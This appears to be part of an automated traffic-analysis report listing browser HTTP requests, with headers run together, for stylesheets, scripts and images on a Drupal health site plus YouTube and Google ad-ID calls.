Source: global traffic	HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/clearfix.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/reset-appearance.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/system-status-report-general-info.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/fieldgroup.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/system-status-report-counters.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/resize.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/layout_discovery/layouts/onecol/onecol.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/css/style.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-rj HTTP/1.1host: yt3.ggpht.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /modules/views_slideshow/modules/views_slideshow_cycle/css/views_slideshow_cycle.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/theme.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/misc/drupalSettingsLoader.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/facebook.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/youtube.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/nowrap.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/tree-child.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/system-status-counter.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/misc/drupal.init.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/webform/modules/webform_bootstrap/css/webform_bootstrap.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/ckeditor5/css/ckeditor5.dialog.fix.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/tablesort.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/css/questionnaire.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/css/banner-slider.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/once/once.min.js?v=1.0.1 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/jquery-patch-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/facebook.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/youtube.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic	HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/maxresdefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/twitter.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCF295eNAE90ECcWgYwCgZpl6X5Wg HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/maxresdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/twitter.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/version-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/Message-Blue.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/scroll-parent-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/hidden.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/underscore/underscore-min.js?v=1.13.6 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/safe-active-element-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
